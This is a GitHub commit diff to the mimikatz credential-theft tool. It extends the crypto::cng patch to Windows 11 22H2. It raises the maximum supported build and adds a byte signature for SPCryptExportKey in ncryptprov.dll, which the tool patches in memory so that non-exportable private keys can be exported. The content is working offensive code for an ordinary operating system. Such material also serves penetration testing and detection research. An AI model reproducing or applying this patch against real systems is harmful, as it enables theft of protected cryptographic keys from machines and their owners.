Skip to content

Commit

Permalink
Add new crypto::cng patch tested on Windows 11 22H2 x64 (ncryptprov.d…
Browse files Browse the repository at this point in the history 
…ll 10.0.22621.1635)
  • Loading branch information
@4050
4050 committed May 9, 2023
1 parent 84b9fe6 commit af0188a
Show file tree
Hide file tree
Showing 2 changed files with 6 additions and 1 deletion.
4 changes: 3 additions & 1 deletion inc/globals.h
100755 → 100644
View file
Original file line number Diff line number Diff line change
Expand Up @@ -32,7 +32,7 @@
#define MIMIKATZ L"mimikatz"
#define MIMIKATZ_VERSION L"2.2.0"
#define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
#define MIMIKATZ_MAX_WINBUILD L"19041"
#define MIMIKATZ_MAX_WINBUILD L"22601"
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") #" MIMIKATZ_MAX_WINBUILD L" " TEXT(__DATE__) L" " TEXT(__TIME__)
#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\""
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
Expand Down Expand Up @@ -121,6 +121,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_10_21H2 19044
#define KULL_M_WIN_BUILD_10_22H2 19045
#define KULL_M_WIN_BUILD_2022 20348
#define KULL_M_WIN_BUILD_11_22H2 22621

#define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000
Expand All @@ -131,6 +132,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_11 22000


/* mimikatz 3 transition */
#define PRINT_ERROR_NUMBER(func, error) PRINT_ERROR(func L": 0x%08x\n", error)

Expand Down
3 changes: 3 additions & 0 deletions mimikatz/modules/crypto/kuhl_m_crypto_patch.c
100755 → 100644
View file
Original file line number Diff line number Diff line change
Expand Up @@ -114,6 +114,8 @@ BYTE PTRN_W10_1607_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x0f, 0x84};
BYTE PTRN_W10_1703_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x0a, 0x0f, 0x84};
BYTE PTRN_W10_1809_SPCryptExportKey[] = {0xf6, 0x45, 0x24, 0x02, 0x0f, 0x84};
BYTE PTRN_W10_20H2_SPCryptExportKey[] = {0xf6, 0x45, 0x24, 0x02, 0x75, 0x46};
BYTE PTRN_W11_22H2_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75, 0x2d};

BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9};
KULL_M_PATCH_GENERIC CngReferences[] = {
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WI60_SPCryptExportKey), PTRN_WI60_SPCryptExportKey}, {sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}}, //last parameter is the offset from the search pattern location where patch will be applied
Expand All @@ -129,6 +131,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
{KULL_M_WIN_BUILD_10_20H2, {sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620 or .2193
{KULL_M_WIN_BUILD_10_21H2, {sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620 or .2193
{KULL_M_WIN_BUILD_10_22H2, {sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620 or .2193
{KULL_M_WIN_BUILD_11_22H2, {sizeof(PTRN_W11_22H2_SPCryptExportKey),PTRN_W11_22H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.22621.1635 and maybe others

};
#elif defined _M_IX86
Expand Down

0 comments on commit af0188a

Please sign in to comment.